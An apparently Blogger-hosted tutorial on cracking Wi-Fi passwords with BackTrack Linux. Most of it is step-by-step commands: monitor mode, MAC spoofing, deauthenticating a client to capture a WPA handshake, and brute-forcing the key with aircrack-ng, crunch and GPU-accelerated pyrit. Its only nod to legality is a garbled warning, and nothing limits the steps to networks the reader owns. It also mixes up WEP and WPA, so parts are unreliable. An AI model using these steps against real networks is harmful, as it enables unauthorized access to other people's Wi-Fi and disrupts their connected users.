How to Use Backtrack To Hack Wi-Fi

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.  


 certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!
  •  press enter......go on



  •  At BOOT Menu....just type startx

  • an Now your all set to go...just simply follow below steps...now  


Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts ofsecurity testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads
    • I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

     Steps to Follow:
    Step 1 :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step 2 :
    airmon-ng start wlan0

    Step 3 (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step 4 :
    airodump-ng mon0

    Then, press "
    Ctrl+c" to break the program.

    Step 5 :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID

    This terminal is keeping running.

    Step 6 :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step 7 :

    Use the John the Ripper as word list to crack the WPA/WP2 password.
    aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

    Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

    If you do not want to use John the Ripper as word list, you can use Crunch.

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download crunch 3.0 (the current version at the time of this writing).
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install

    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    (B) nVidia Display Card with CUDA

    If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

    Step a :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step b :
    airmon-ng start wlan0

    Step c (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step d :
    airodump-ng mon0

    Then, press "
    Ctrl+c" to break the program.

    Step e :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

    Step f :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step g :

    If the following programs are not yet installed, please do it.
    apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

    Step h :

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download 
    crunch 3.0 (the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install


    Step i :

    Go to the official site of pyrit.
    http://code.google.com/p/pyrit/downloads/list

    Download 
    pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
    tar -xzvf pyrit-0.4.0.tar.gz
    cd pyrit-0.4.0
    python setup.py build
    sudo python setup.py install

    tar -xzvf cpyrit-cuda-0.4.0.tar.gz
    cd cpyrit-cuda-0.4.0
    python setup.py build
    sudo python setup.py install


    Step j :
    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    Step k (Optional) :

    If you encounter error when reading the 
    wpacrack-01.cap, you should do the following step.
    pyrit -r wpacrack-01.cap -o new.cap stripLive
    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    Step l :

    Then, you will see something similar to the following.
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+

    Parsing file 'new.cap' (1/1)...
    Parsed 71 packets (71 802.11-packets), got 55 AP(s)

    Tried 17960898 PMKs so far; 17504 PMKs per second.


    Remarks :

    If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

    To test if your wireless card (either USB or PCI-e) can do the injection or not :
    airodump-ng mon0
    Open another terminal.
    aireplay-ng -9 mon0
    Make sure pyrit workable on your system :
    pyrit list_cores

    That's all! See you. 
    THANKS YOU AND plz follow me in blog.............

    No comments:

    Powered by Blogger.